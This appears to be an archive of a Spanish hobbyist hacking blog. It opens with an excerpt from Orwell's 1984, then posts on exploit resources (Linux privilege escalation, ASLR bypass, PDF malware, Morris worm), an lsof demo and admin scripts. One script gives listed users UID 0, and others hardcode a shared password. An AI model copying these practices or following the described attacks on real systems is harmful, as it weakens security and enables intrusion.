~Unix & Cisco & Hacks~

-Tenemos que vernos otro día -dijo Winston. -Sí, tenemos que vemos-dijo ella.

2012-02-09T09:26:00.002+01:00

Le pasó aquel sobresalto. Volvió a poner la pieza en su sitio, pero por un instante no pudo concentrarse en el problema de ajedrez. Sus pensamientos volvieron a vagar. Casi conscientemente trazó con su dedo en el polvo de la mesa:

2 + 2 =

«Dentro de ti no pueden entrar nunca», le había dicho Julia. Pues, sí, podían penetrar en uno. «Lo que te ocurre aquí es para siempre», le había dicho O¹Brien. Eso era verdad. Había cosas, los actos propios, de las que no era posible rehacerse. Algo moría en el interior de la persona; algo se quemaba, se cauterizaba. Winston la había visto, incluso había hablado con ella. Ningún peligro había en esto. Winston sabía instintivamente que ahora casi no se interesaban por lo que él hacía. Podía haberse citado con ella si lo hubiera deseado. Esa única vez se habían encontrado por casualidad. Fue en el Parque, un día muy desagradable de marzo en que la tierra parecía hierro y toda la hierba había muerto. Winston andaba rápidamente contra el viento, con las manos heladas y los ojos acuosos, cuando la vio a menos de diez metros de distancia. Enseguida le sorprendió que había cambiado de un modo indefinible. Se cruzaron sin hacerse la menor señal. Él se volvió y la siguió, pero sin un interés desmedido. Sabía que ya no había peligro, que nadie se interesaba por ellos. Julia no le hablaba. Siguió andando en dirección oblicua sobre el césped, como si tratara de librarse de él, y luego pareció resignarse a llevarlo a su lado. Por fin, llegaron bajo unos arbustos pelados que no podían servir ni para esconderse ni para protegerse del viento. Allí se detuvieron. Hacía un frío molestísimo. El viento silbaba entre las ramas. Winston le rodeó la cintura con un brazo

No había telepantallas, pero debía de haber micrófonos ocultos. Además, podían verlos desde cualquier parte. No importaba; nada importaba. Podrían haberse echado sobre el suelo y hacer eso si hubieran querido. Su carne se estremeció de horror tan sólo al pensarlo. Ella no respondió cuando la agarró del brazo, ni siquiera intentó desasirse. Ya sabía Winston lo que había cambiado en ella. Tenía el rostro más demacrado y una larga cicatriz, oculta en parte por el cabello, le cruzaba la frente y la sien; pero el verdadero cambio no radicaba en eso. Era que la cintura se le había ensanchado mucho y toda ella estaba rígida. Recordó Winston como una vez después de la explosión de una bomba cohete había ayudado a sacar un cadáver de entre unas ruinas y le había asombrado no sólo su increíble peso, sino su rigidez y lo dificil que resultaba manejarlo, de modo que más parecía piedra que carne. El cuerpo de Julia le producía ahora la misma sensación. Se le ocurrió pensar que la piel de esta mujer sería ahora de una contextura diferente.

No intentó besarla ni hablaron. Cuando marchaban juntos por el césped, lo miró Julia a la cara por primera vez. Fue sólo una mirada fugaz, llena de desprecio y de repugnancia. Se preguntó Winston si esta aversión procedía sólo de sus relaciones pasadas, o si se la inspiraba también su desfigurado rostro y el agüilla que le salía de los ojos. Sentáronse en dos sillas de hierro uno al lado del otro, pero no demasiado juntos. Winston notó que Julia estaba a punto de hablar. Movió unos cuantos centímetros el basto zapato y aplastó con él una rama. Su pie parecía ahora más grande, pensó Winston. Julia, por fin, dijo sólo esto:

-Te traicioné.

-Yo también te traicioné -dijo él.

Julia lo miró otra vez con disgusto. Y dijo:

-A veces te amenazan con algo..., algo que no puedes soportar, que ni siquiera puedes imaginarte sin temblar. Y entonces dices: «No me lo hagas a mí, házselo a otra persona, a Fulano de Tal». Y quizá pretendas, más adelante, que fue sólo un truco y que lo dijiste únicamente para que dejaran de martirizarte y que no lo pensabas de verdad. Pero, no. Cuando ocurre eso se desea de verdad y se desea que a la otra persona se lo hicieran. Crees entonces que no hay otra manera de salvarte y estás dispuesto a salvarte así. Deseas de todo corazón que eso tan terrible le ocurra a la otra persona y no a ti. No te importa en absoluto lo que pueda sufrir. Sólo te importas entonces tú mismo.

-Sólo te importas entonces tú mismo -repitió Winston como un eco.

-Y después de eso no puedes ya sentir por la otra persona lo mismo que antes.

-No -dijo él-, no se siente lo mismo.

No parecían tener más que decirse. El viento les pegaba a los cuerpos sus ligeros «monos». A los pocos instantes les producía una sensación embarazoso seguir allí callados. Además, hacía demasiado frío para estarse quietos. Julia dijo algo sobre que debía coger el Metro y se levantó para marcharse.

-Tenemos que vernos otro día -dijo Winston.

-Sí, tenemos que vemos-dijo ella.

Winston, irresoluto, la siguió un poco. Iba a unos pasos detrás de ella. No volvieron a hablar. Aunque Julia no le dijo que se apartara, andaba muy rápida para evitar que fuese junto a ella. Winston se había decidido a acompañarla a la estación del Metro, pero de repente se le hizo un mundo tener que andar con tanto frío. Le parecía que aquello no tenía sentido. No era tanto el deseo de apartarse de Julia como el de regresar al café lo que le impulsaba, pues nunca le había atraído tanto El Nogal como en este momento. Tenía una visión nostálgica de su mesa del rincón, con el periódico, el ajedrez y la ginebra que fluía sin cesar. Sobre todo, allí haría calor. Por eso, poco después y no sólo accidentalmente, se dejó separar de ella por una pequeña aglomeración de gente. Hizo un desganado intento de volver a seguirla, pero disminuyó el paso y se volvió, marchando en dirección opuesta. Cinco metros más allá se volvió a mirar. No había demasiada circulación, pero ya no podía distinguirla. Julia podría haber sido cualquiera de doce figuras borrosas que se apresuraban en dirección al Metro. Es posible que no pudiera reconocer ya su cuerpo tan deformado.

«Cuando ocurre eso, se desea de verdad», y él lo había pensado en serio. No solamente lo había dicho, sino que lo había deseado. Había deseado que fuera ella y no él quien tuviera que soportar a las...

Se produjo un sutil cambio en la música que brotaba de la telepantalla. Apareció una nota humorística, «la nota amarilla». Una voz quizá no estuviera sucediendo de verdad, sino que fuera sólo un recuerdo que tomase forma de sonido cantaba:

Bajo el Nogal de las ramas extendidas

yo te vendí y tu me vendiste.

Winston tenía los ojos más lacrimosos que de costumbre. Un camarero que pasaba junto a él vio que tenía vacío el vaso y volvió a llenárselo de la botella de ginebra.

Winston olió el líquido. Aquello estaba más repugnante cuanto más lo bebía, pero era el elemento en que él nadaba. Era su vida, su muerte y su resurrección. La ginebra lo hundía cada noche en un sopor animal, y también era la ginebra lo que le hacía revivir todas las mañanas. Al despertarse rara vez antes de las once con los párpados pegajosos, una boca pastosa y la espalda que parecía habérsele partido le habría sido imposible echarse abajo de la cama si no hubiera tenido siempre en la mesa de noche la botella de ginebra y una taza. Durante la mañana se quedaba escuchando la telepantalla con una expresión pétrea y la botella siempre a mano. Desde las quince hasta la hora de cerrar, se pasaba todo el tiempo en El Nogal. Nadie se preocupaba de lo que hiciera, no le despertaba ningún silbato ni le dirigía advertencias la telepantalla. Dos veces a la semana iba a un despacho polvoriento, que parecía un rincón olvidado, en el Ministerio de la Verdad, y trabajaba un poco, si a aquello podía llamársele trabajo. Había sido nombrado miembro de un subcomité de otro subcomité que dependía de uno de los innumerables subcomités que se ocupaban de las dificultades de menos importancia planteadas por la preparación de la onceava edición del Diccionario de Neolengua. En aquel despacho se dedicaban a redactar algo que llamaban el informe provisional, pero Winston nunca había llegado a enterarse de qué tenían que informar. Tenía alguna relación con la cuestión de si las comas deben ser colocadas dentro o fuera de las comillas. Había otros cuatro en el subcomité, todos en situación semejante a la de Winston. Algunos días se marchaban apenas se habían reunido después de reconocer sinceramente que no había nada que hacer. Pero otros días se ponían a trabajar casi con encarnizamiento haciendo grandes alardes de aprovechamiento del tiempo redactando largos informes que nunca terminaban. En esas ocasiones discutían sobre cual era el asunto sobre cuya discusión se les había encargado y esto les llevaba a complicadas argumentaciones y sutiles distingos con interminables digresiones, peleas, amenazas e incluso recurrían a las autoridades superiores. Pero de pronto parecía retirárselas la vida y se quedaban inmóviles en torno a la mesa mirándose unos a otros con ojos apagados como fantasmas que se esfuman con el canto del gallo.

La telepantalla estuvo un momento silenciosa. Winston levantó la cabeza otra vez. ¡El comunicado! Pero no, sólo era un cambio de música. Tenía el mapa de África detrás de los párpados, el movimiento de los ejércitos que él imaginaba era este diagrama; una flecha negra dirigiéndose verticalmente hacia el Sur y una flecha blanca en dirección horizontal, hacia el Este, cortando la cola de la primera. Como para darse ánimos, miró el imperturbable rostro del retrato. ¿Podía concebirse que la segunda flecha no existiera?

Volvió a aflojársela el interés. Bebió más ginebra, cogió la pieza blanca e hizo un intento de jugada. Pero no era aquélla la jugada acertada, porque...

Sin quererlo, le flotó en la memoria un recuerdo. Vio una habitación iluminada por la luz de una vela con una gran cama de madera clara y él, un chico de nueve o diez años que estaba sentado en el suelo agitando un cubilete de dados y riéndose excitado. Su madre estaba sentada frente a él y también se reía. Aquello debió de ocurrir un mes antes de desaparecer ella. Fueron unos momentos de reconciliación en que Winston no sentía aquel hambre imperiosa y le había vuelto temporalmente el cariño por su madre. Recordaba bien aquel día, un día húmedo de lluvia continua. El agua chorreaba monótona por los cristales de las ventanas y la luz del interior era demasiado débil para leer. El aburrimiento de los dos niños en la triste habitación era insoportable. Winston gimoteaba, pedía inútilmente que le dieran de comer, recorría la habitación revolviéndolo todo y dando patadas hasta que los vecinos tuvieron que protestar. Mientras, su hermanita lloraba sin parar. Al final le dijo su madre: «Sé bueno y te compraré un juguete. Sí, un juguete precioso que te gustará mucho». Y había salido a pesar de la lluvia para ir a unos almacenes que estaban abiertos a esa hora y volvió con una caja de cartón conteniendo el juego llamado «De las serpientes y las escaleras». Era muy modesto. El cartón estaba rasgado y los pequeños dados de madera, tan mal cortados que apenas se sostenían. Winston recordaba el olor a humedad del cartón. Había mirado el juego de mal humor. No le interesaba gran cosa. Pero entonces su madre encendió una vela y se sentaron en el suelo a jugar. Jugaron ocho veces ganando cuatro cada uno. La hermanita, demasiado pequeña para comprender de qué trataba el juego, miraba y se reía porque los veía reír a ellos dos. Habían pasado la tarde muy contentos, como cuando él era más pequeño.

Apartó de su mente estas imágenes. Era un falso recuerdo. De vez en cuando le asaltaban falsos recuerdos. Esto no importaba mientras que se supiera lo que era. Winston volvió a fijar la atención en el tablero de ajedrez, pero casi en el mismo instante dio un salto como si lo hubieran pinchado con un alfiler.

Un agudo trompetazo perforó el aire. Era el comunicado, ¡victoria!; siempre significaba victoria la llamada de la trompeta antes de las noticias. Una especie de corriente eléctrica recorrió a todos los que se hallaban en el café. Hasta los camareros se sobresaltaron y aguzaron el oído.

La trompeta había dado paso a un enorme volumen de ruido. Una voz excitada gritaba en la telepantalla, pero apenas había empezado fue ahogada por una espantosa algarabía en las calles. La noticia se había difundido como por arte de magia. Winston había oído lo bastante para saber que todo había sucedido como él lo había previsto: una inmensa armada, reunida secretamente, un golpe repentino a la retaguardia del enemigo, la flecha blanca destrozando la cola de la flecha negra. Entre el estruendo se destacaban trozos de frases triunfales: «Amplia maniobra estratégica... perfecta coordinación... tremenda derrota medio millón de prisioneros... completa desmoralización... controlamos el África entera. La guerra se acerca a su final... victoria... la mayor victoria en la historia de la Humanidad. ¡Victoria, victoria, victoria!».

Bajo la mesa, los pies de Winston hacían movimientos convulsivos. No se había movido de su asiento, pero mentalmente estaba corriendo, corriendo a vertiginosa velocidad, se mezclaba con la multitud, gritaba hasta ensordecer. Volvió a mirar el retrato del Gran Hermano. ¡Aquél era el coloso que dominaba el mundo! ¡La roca contra la cual se estrellaban en vano las hordas asiáticas! Recordó que sólo hacía diez minutos. sí, diez minutos tan sólo todavía se equivocaba su corazón al dudar si las noticias del frente serían de victoria o de derrota. ¡Ah, era más que un ejército eurasiático lo que había perecido! Mucho había cambiado en él desde aquel primer día en el Ministerio del Amor, pero hasta ahora no se había producido la cicatrización final e indispensable, el cambio salvador. La voz de la telepantalla seguía enumerando el botín, la matanza, los prisioneros, pero la gritería callejera había amainado un poco. Los camareros volvían a su trabajo. Uno de ellos acercó la botella de ginebra. Winston, sumergido en su feliz ensueño, no prestó atención mientras le llenaban el vaso. Ya no se veía corriendo ni gritando, sino de regreso al Ministerio del Amor, con todo olvidado, con el alma blanca como la nieve. Estaba confesándolo todo en un proceso público, comprometiendo a todos. Marchaba por un claro pasillo con la sensación de andar al sol y un guardia armado lo seguía. La bala tan esperada penetraba por fin en su cerebro.

Contempló el enorme rostro. Le había costado cuarenta años saber qué clase de sonrisa era aquella oculta bajo el bigote negro. ¡Qué cruel e inútil incomprensión! ¡Qué tozudez la suya exilándose a sí mismo de aquel corazón amante! Dos lágrimas, perfumadas de ginebra, le resbalaron por las mejillas. Pero ya todo estaba arreglado, todo alcanzaba la perfección, la lucha había terminado. Se había vencido a sí mismo definitivamente. Amaba al Gran Hermano.

Aprendiendo a hacer exploits

2012-01-29T11:05:00.001+01:00

En el mejor foro de seguridad del mundo, un hilo cuyo titulo es Syscall a exit(0) ASM incrustada en C. Problema de segfault..

Enjoy!

Correos de los diputados que tienen voz sobre ACTA

2012-01-28T17:49:00.001+01:00

Nunca acabareis con nosotros.

Overflowed Minds hacks your mind!

Codigo para evadir EMET

2012-01-25T12:59:00.001+01:00

Se bienvenido a Overflowed Minds!

Linux Local Privilege Escalation via SUID /proc/pid/mem Write

2012-01-24T16:04:00.001+01:00

http://blog.zx2c4.com/749

Introducing Mempodipper, an exploit for CVE-2012-0056. /proc/pid/mem is an interface for reading and writing, directly, process memory by seeking around with the same addresses as the process’s virtual memory space. In 2.6.39, the protections against unauthorized access to /proc/pid/mem were deemed sufficient, and so the prior #ifdef that prevented write support for writing to arbitrary process memory was removed. Anyone with the correct permissions could write to process memory. It turns out, of course, that the permissions checking was done poorly. This means that all Linux kernels >=2.6.39 are vulnerable, up until the fix commit for it a couple days ago. Let’s take the old kernel code step by step and learn what’s the matter with it.

A falta de probarlo, tiene buena pinta.

Enjoy!

Anonymous hackea una empresa de seguridad, roba un millon de dolares y lo dona a caridad

2011-12-25T18:14:00.000+01:00

http://waronsociety.noblogs.org/?p=2686

Feliz navidad.

Mama un consejo, la SOPA me deja sopa

2011-12-21T11:33:00.002+01:00

http://alt1040.com/2011/12/desopa-la-extension-para-firefox-que-ignora-el-bloqueo-dns

Sopa en sueco significa Basura.

Hacking QR codes

2011-12-02T12:06:00.001+01:00

Jugando a poner logos personalizados dentro de un codigo QR de esos de los nuevos moviles. ¿Que pondra?

Un saludo.

Exploit exercises

2011-11-26T16:34:00.005+01:00

http://exploit-exercises.com/ Ya tengo diversion.

About Exploit Exercises

exploit-exercises.com provides a variety of virtual machines, documentation and challenges that can be used to learn about a variety of computer security issues such as privilege escalation, vulnerability analysis, exploit development, debugging, reverse engineering.

Nebula takes the participant through a variety of common (and less than common) weaknesses and vulnerabilities in Linux. It takes a look at

SUID files
Permissions
Race conditions
Shell meta-variables
$PATH weaknesses
Scripting language weaknesses
Binary compilation failures
At the end of Nebula, the user will have a reasonably thorough understanding of local attacks against Linux systems, and a cursory look at some of the remote attacks that are possible.

Protostar introduces the following in a friendly way:

Network programming
Byte order
Handling sockets
Stack overflows
Format strings
Heap overflows
The above is introduced in a simple way, starting with simple memory corruption and modification, function redirection, and finally executing custom shellcode. Address Space Layout Randomisation and Non-Executable memory has been disabled.

Fusion is the next step from the protostar setup, and covers more advanced styles of exploitation, and covers a variety of anti-exploitation mechanisms such as:

Address Space Layout Randomisation
Position Independent Executables
Non-executable Memory
Source Code Fortification (_DFORTIFY_SOURCE=)
Stack Smashing Protection (ProPolice / SSP)
In addition to the above, there are a variety of other challenges and things to explore, such as:

Cryptographic issues
Timing attacks
Variety of network protocols (such as Protocol Buffers and Sun RPC)
At the end of Fusion, the participant will have a through understanding of exploit prevention strategies, associated weaknesses, various cryptographic weaknesses, numerous heap implementations.

A disfrutar.

"Recuperando" archivos borrados con lsof

2011-11-24T19:38:00.004+01:00

Hola,

Puede usarse el mitico lsof para recuperar archivos borrados. Por ejemplo, logs borrados en una maquina comprometida que aun estan siendo accedidos por su demonio correspondiente, un servidor Apache, etc.

En un terminal:

$ echo probando >basura7
$ less basura7

Y dejamos el less con el archivo abierto. Entonces en otro terminal:

$ rm basura7
$ ls basura7
/bin/ls: basura7: No such file or directory
$ lsof |grep basura7
less      14481       usuario    4r      REG        8,1          9    2627682 /tmp/basura7 (deleted)
$ file /proc/14481/fd/4
/proc/14481/fd/4: broken symbolic link to `/tmp/basura7 (deleted)'
$ cat /proc/14481/fd/4
probando

El primer numero es el PID. El segundo el numero de descriptor de fichero donde ese proceso lo tiene abierto. Y ahi esta "recuperado" (entre comillas porque realmente nunca se borro del disco).

ksh / expect AIX create users

2011-11-16T15:53:00.006+01:00

Hola,

Aqui dos scripts tontos en ksh para AIX que acabo de hacer por si le pueden servir a alguien. Uno crea todos los usuarios listados en el archivo de texto que se le pasa como argumento al script. En cada linea dos columnas, el user seguido del grupo principal al que debe pertenecer. El otro es un script expect que asigna una contraseña a los usuarios, pues el comando passwd de este AIX no tiene opcion -stdin.

3. Lo aburrido y rutinario es malo.

#!/usr/bin/ksh
PERS_HOME="/home/"
PASS="el_password"
PERS_SH="/usr/bin/ksh"
cat $1 | \while read USER GROUP
do
  # Si ya existe el user
  cut -d: -f1 /etc/passwd |grep ${USER} >/dev/null
  OUT=$?  if [[ ${OUT} -eq 0 ]]  then
  echo >&2 "ERROR: El usuario: ${USER} ya existe."
  else
    useradd -g ${GROUP} -m -d ${PERS_HOME}${USER} -s ${PERS_SH} ${USER}
    ./pass.exp ${USER} ${PASS}
    # Forzar usuario a cambiar password en el siguiente inicio de sesion
    pwdadm -f ADMCHG ${USER}
  fi
done

pass.exp:

#!/usr/bin/expect
spawn passwd [lindex $argv 0]
set password [lindex $argv 1]
expect "password:"send "$password\r"
expect "password:" { send "$password\r" } \
"password again:" { send "$password\r" }
expect eof

3. Boredom and drudgery are evil.

Hackers (and creative people in general) should never be bored or have to drudge at stupid repetitive work, because when this happens it means they aren't doing what only they can do: solve new problems. This wastefulness hurts everybody. Therefore boredom and drudgery are not just unpleasant but actually evil.

To behave like a hacker, you have to believe this enough to want to automate away the boring bits as much as possible, not just for yourself but for everybody else (especially other hackers).

bash create users and make root a list of users (UID = 0)

2011-11-15T18:02:00.008+01:00

Hola,

Aqui dos scripts tontos en bash que acabo de hacer por si le pueden servir a alguien. Uno crea todos los usuarios listados en el archivo de texto que se le pasa como argumento al script. El otro hace root a los usuarios definidos en el archivo de texto que tambien se pasa como argumento.

Evidentemente, yo implementaria sudo, pero a veces no depende de uno.

3. Lo aburrido y rutinario es malo.

#!/bin/bash
# create_users.sh v0.1 / vlan7 / 15-Nov-2011
# Crea users pasados en argumento como archivo de texto, un user por linea
# hay que ser root
if [ $EUID -ne 0 ]; then
  echo "Este script solo puede ejecutarlo root" 1>&2
  exit 1
fi

# vars
PERS_HOME="/home/"
PERS_SH="/bin/bash"
PASS="el_password"

# hay argumento?
[ $# -eq 0 ] && { echo >&2 ERROR: Debe introducir como argumento un txt con usuarios, uno por linea ; exit 1; }
# file exists?
[ -f "$1" ] || { echo >&2 ERROR: El archivo pasado como argumento no existe ; exit 1; }
NOW=$(date +"%Y-%m-%d-%X")
HOSTNAME=$(hostname)
LOGFILE="create_users_log-$HOSTNAME-$NOW.log"
TEMP_FILE=$(mktemp)
# remove duplicates & blank lines
awk ' !x[$0]++' $1 | grep -v '^$' >$TEMP_FILE
for user in $(cat $TEMP_FILE); do
  # Si ya existe el user
  cut -d: -f1 /etc/passwd | grep "$user" > /dev/null
  OUT=$?
  if [ $OUT -eq 0 ];then
    echo >&2 "ERROR: El usuario: \"$user\" ya existe."
    echo >&2 "ERROR: El usuario: \"$user\" ya existe." >> "$LOGFILE"
  else
    # Creamos nuevo user
    /usr/sbin/useradd -d "$PERS_HOME""$user" -s "$PERS_SH" -m "$user"
    # Asignamos passwd.
    echo $PASS | passwd --stdin $user
    # Forzamos cambio al primer logeo.
    passwd -e $user
    # grabamos user/pass en log
    echo -e $user"\t"$PASS >> "$LOGFILE"
    echo "El usuario \"$user\" ha sido creado y su password es: $PASS"
  fi
done

#!/bin/bash
# mod_users.sh v0.1 / vlan7 / 15-Nov-2011
# Modifica users (hace UID=0) pasados en argumento como archivo de texto

# hay que ser root
if [ $EUID -ne 0 ]; then
  echo "Este script solo puede ejecutarlo root" 1>&2
  exit 1
fi

# hay argumento?
[ $# -eq 0 ] && { echo >&2 ERROR: Debe introducir como argumento un txt con usuarios, uno por linea ; exit 1; }
# file exists?
[ -f "$1" ] || { echo >&2 ERROR: El archivo pasado como argumento no existe ; exit 1; }
NOW=$(date +"%Y-%m-%d-%X")
HOSTNAME=$(hostname)
LOGFILE="mod_users_log-$HOSTNAME-$NOW.log"
TEMP_FILE=$(mktemp)
# remove duplicates & blank lines
awk ' !x[$0]++' $1 | grep -v '^$' >$TEMP_FILE
for user in $(cat $TEMP_FILE); do
  # Si no existe el user
  cut -d: -f1 /etc/passwd | grep "$user" > /dev/null
  CAMPO1=$?
  # Si el user ya es root
  cut -d: -f3 /etc/passwd | grep "$user" > /dev/null
  CAMPO3=$?
  if [ $CAMPO1 -ne 0 -o $CAMPO3 -ne 1 ];then
    echo >&2 "ERROR: El usuario: \"$user\" no existe o ya es root."
    echo >&2 "ERROR: El usuario: \"$user\" no existe o ya es root." >> "$LOGFILE"
  else
    # Hacemos root al user
    /usr/sbin/usermod -u 0 --non-unique "$user"
    # grabamos user en log
    echo "$user ahora es root" >> "$LOGFILE"
    echo "El usuario \"$user\" ha sido hecho root"
  fi
done

Igual le sirven a alguien.

Fascinacion por los aparatos

2011-10-29T00:31:00.004+02:00

Yo llegue a usar precisamente este terminal tonto VT220. Estuvo en el A2 de la FIB de la UPC hasta que retiraron los VTxxx. Estaba alimentado solo por una pila (un hack es eso). Con ese terminal (u otros, habia de VT220 a VT440, la diferencia notable era la rapidez del scroll) conectaba contra alguno de los dos VAX que estaban en cluster, un 8600 que entro en la FIB el año 1986 y compartia 6 discos con otro VAX 785 de tal forma que no se duplicaba el SW y se garantizaba la consistencia de los datos almacenados. Como se compartian los datos se podia trabajar indistintamente, bajo autorizacion, en el 8600 o en el 785. El LCFIB (Laboratori de Calcul de la Facultat d'Informatica de Barcelona) bautizo ese cluster con el nombre de "ISIS", y los hostnames eran chooyu o meiga. Me gustaba Opera en plena guerra Netscape / IE, pero en los terminales tontos tenia que navegar con Lynx, conectaba por telnet a MUDs (juegos de rol en modo texto al estilo de las viejas aventuras conversacionales) como Medina en la direccion nescafib.upc.es en no recuerdo que puerto. El Medina fue hecho por algunos colgados de la FIB, y no era mas que un fork de uno ingles (Aurora creo) y creo que fue el primer MUD en castellano. En el Medina matabas a profesores de entonces por el campus, etc. (la LOPD nunca se metio con nosotros por meter nombres y apellidos de profesores). Podias hacer grupos con gente que se conectaba de otras universidades y corrias el riesgo de que el operador (el becario encargado) te hiciera un "disuser" (lo habitual era una semana sin cuenta) si te pillaban. Incluso consegui un cliente de IRC para VMS, no recuerdo ni de donde. En los 90 Telefonica (Infovia) no estaba al alcance de muchos de nosotros y la tarifa plana era una utopia.

Exploiting para niños. Protecciones implementadas por el S.O. La historia

2011-09-22T20:54:00.005+02:00

Hola exploiters,

Estoy escribiendo un documento sobre la historia de las protecciones implementadas por el S.O. a los buffer overlows. Es aun un borrador y puede encontrarse el WIP en la wiki de shellcoding en la direccion Exploiting para niños. Protecciones implementadas por el S.O. La historia.

Mi idea es crear un documento con cierta perspectiva historica sobre las protecciones contra buffer overflows implementadas por el S.O. mas que crear un documento tecnico, de ahi el nombre.

La wiki xchg ax, ax ha sido remodelada, aunque no quiero dedicar demasiado tiempo pues no soy diseñador.

Suerte,

bot irc en python que dice titulos de youtubes que escriben los users

2011-08-26T16:44:00.010+02:00

Hola,

Hace poco mas de un año hice un bot irc en bash programado para decir los titulos de los youtubes que escribian por el general de un canal de irc sus usuarios.

Hoy comparto con vosotros un bot irc codificado en python por mi amigo vermells. Es un colega que anda dandole a diversos lenguajes de programacion, sobre todo C y python, y python es el lenguaje en que mas comodo se siente. Esta probado tanto en Linux como windows. Ahi va:

import socket, string, urllib2
#Programa que crea un bot para el IRC
def formateo(cadena):
    cont = 0
    cadena=cadena+';'
    lista=[]
    while cont!= len(cadena):
        if cadena[cont]=='&':
            while cadena[cont]!=';':
                cont+=1
        else:
            lista.append(cadena[cont])
            cont+=1
    while ';' in lista:
       del lista[lista.index(';')]
    title=string.join(lista)
    socket_bot.send('PRIVMSG '+canal+' :'+'\x0300,10'+title+'\n')
botnick = "Manolo333"
server = "luna.irc-hispano.org"
puerto = 6667
canal = "#canal"
cont=1
f = open("log.txt", "w")
socket_bot = socket.socket()
socket_bot.connect((server, puerto))
socket_bot.send('USER bobo bubu bibi :amateur\n')
socket_bot.send('NICK ' +botnick+'\n')
while True:
    line = socket_bot.recv(4096)
    print line
    if line.find('PING')!=-1:
        socket_bot.send('PONG ' +line.split()[1]+'\r\n') 
    socket_bot.send("JOIN " +canal+'\n')        
    f.write(line)
    cont=cont+1
    if cont==1000:
        print "se cerrara el archivo"
        f.close()
        socket_bot.close()
    if line.find('youtube.com') != -1:
            tmp = line.split()
            tmp = tmp.pop()
            title = tmp[1:]
            try:
                url = urllib2.urlopen(title)
                while True:
                    html = url.readline()
                    if html.find('') != -1:<br />                        html = url.readline()<br />                        print html<br />                        while html.find('') == -1:
                            formateo(html)
                            html = url.readline()
                        break
            except:
                continue

Suerte,

The smallest Linux ELF binary to print 'Hello world!' [58 bytes]

2011-07-09T13:11:00.004+02:00

BITS 32
 ORG 0

 DB 0x7F
entry:
 inc ebp
 dec esp
 inc esi
 mov dl, 14
 mov cl, hello
 xor dword [ecx], 0x6C4D6549
 inc ebx
 push dword 0x00030002
 mov al, 4
 int 0x80
 add [eax], eax
 add [eax], al
 sbb [eax], al
 add [eax], al
 sbb [eax], al
 add [eax], al
 xchg eax, esi
 dec ebx
 int 0x80
 DD 0x00210000-0x18
hello: DD 0x00210001
 DB 'o, world!', 10

nasm -f bin -o tiny-hello.bin tiny-hello.asm && chmod +x tiny-hello.bin

Fuente: http://d.hatena.ne.jp/kikx/20061111. Si encuentras algo mejor, dimelo.

Suerte,

Local Linux x86 Shellcoding without any high-level language

2011-05-14T18:18:00.002+02:00

Video complementario al primer numero de las ASM/Shellcoding series

Musica: La perrera - Carne de perro (instrumental)

La idea es sencilla, pero se ilustra el primer shellcode funcional hecho publico (que yo sepa, corregidme de lo contrario!) sin recurrir a lenguajes de alto nivel.

scapy 3-way TCP handshake

2011-05-07T00:54:00.004+02:00

Usando scapy para generar (y enviar) los paquetes necesarios a medida para establecer una conexion contra un servidor FTP (un netcat a la escucha realmente) segun el saludo de 3 vias de TCP.

Y en el mejor foro de seguridad del mundo un hilo con informacion condensada de hack de redes para (casi) todos.

Have fun.

evilbs backdoor

2011-05-06T18:56:00.001+02:00

Haciendo bobadas en casa de un amigo que me dejo sin inet.

Se omiten bobadas mayores como un ataque ARP-spoofing contra el FW Zeroshell para capturar sus credenciales, y a partir de ahi, se juega con este backdoor.

ASLR bypass Linux/x86 ret2eax Classical SUID privilege elevation

2011-04-24T16:35:00.005+02:00

Hola exploiters,

Aqui un video ilustrando un infoleak para vulnerar ASRL en un kernel de Linux actual en el momento de escribir esto.

Ademas se ilustra la elevacion de privilegios mas clasica, explotar un binario SUID vulnerable inyectando un shellcode setuid(0) + execve en tiempo de ejecucion. De vlan7 a root.

Y el paper AQUI.

Enjoy!

Overflowed Minds

2011-03-31T17:09:00.010+02:00

Aupa!

NewLog y yo estamos llevando a cabo un proyecto de shellcoding y explotacion de software, una comunidad que intenta ser un vestigio de epocas pasadas, donde lammers y script-kiddies aun no existian, donde el primer objetivo de las personas era aprender y descubrir, donde el afan por compartir y enseñar superaban, sin lugar a dudas, el propio ego.

Podeis encontrarnos en la red en la URL http://www.overflowedminds.net. Por el momento disponemos de contenido propio en la seccion Papers. Estos son:

~ Introducción a la explotación de software en sistemas Linux
~ Local Linux x86 Shellcoding without any high-level language
~ Bypassing local Linux x86 ASLR protection

Disponemos ademas de un foro en el que parece que comienza a haber cierta actividad, debido, en gran parte, a los blogs que nos han apoyado haciendonos una reseña. Gracias!

En lo que respecta a las demas secciones de la pagina, esperamos llegar a desarrollar algo suficientemente bueno. Aunque quizas quieras ser tu el primero, asi que invitamos a leer el CFH [Call For Hackers] a toda aquella persona que desee colaborar o formar parte de esta comunidad.

Y, ante todo, sed bienvenidos a Overflowed Minds!

Referencias (agradecimientos vamos):

+ Un informático en el lado del mal: Overflowed minds: Aprendiendo a hacer exploits

+ Overflowed Minds, recursos para la seguridad informática | CyberHades

+ Como descubrir vulnerabilidades y escribir exploits | Dragonjar

+ Wadalbertia - Overflowed Minds

metasploit

2011-01-31T20:02:00.009+01:00

Haciendo bobadas en casa de un amigo consiguiendo una shell remota contra un Win suyo.

Se recomienda ver el video a pantalla completa con una resolucion de 720p.

La nana del buffer overflow como arte, hacking o asi-empezo-todo

2011-01-24T16:42:00.011+01:00

worm-src.tar.gz ~ El codigo fuente del gusano de Morris. Es la primera explotacion de un buffer overflow conocida (entre otras muchas cosas que ingeniosamente atacaba el worm). Los comentarios de algunos codigos son buenos, muy buenos.

10.1.1.38.4083.pdf ~ Un analisis del gusano de Morris, por los hackers del MIT. Salio en 1989, a los 3 meses del ataque.

Vulnerability in NCSA HTTPD 1.3 ~ Y aqui tenemos el exploit del tercer BoF de la historia, que publico Lopatic en bugtraq. Es un agradable intercambio de ideas incluso hoy.

"That's all for now.
I hope I managed to prove that exploiting buffer overflows should be an art"
Signed, Solar Designer

Malware en PDF

2011-01-17T16:44:00.003+01:00

Mientras preparo el proximo numero de las ASM/Shellcoding series, como esto lleva tiempo sin actualizar pongo a continuacion algunos de los enlaces que me han parecido mas interesantes del malware en PDF, aunque la tendencia es que vaya ganando terrero el malware en Java.

Sandboxes:
http://sourceforge.net/projects/zerowine-tryout/ <- VM
http://mwanalysis.org/ <- online

Herramientas:
http://jsunpack.jeek.org
http://esec-lab.sogeti.com/dotclear/index.php?pages/Origami <- Muy bueno, con muchos scripts en ruby listos para experimentar.
http://malzilla.sourceforge.net/downloads.html

Distros:
http://zeltser.com/remnux/

Textos:
http://grey-corner.blogspot.com/search/label/malicious%20pdf
http://contagiodump.blogspot.com
http://extraexploit.blogspot.com/
http://zeltser.com/combating-malicious-software/index.html

El ultimo CVE 0day en malware en PDF:
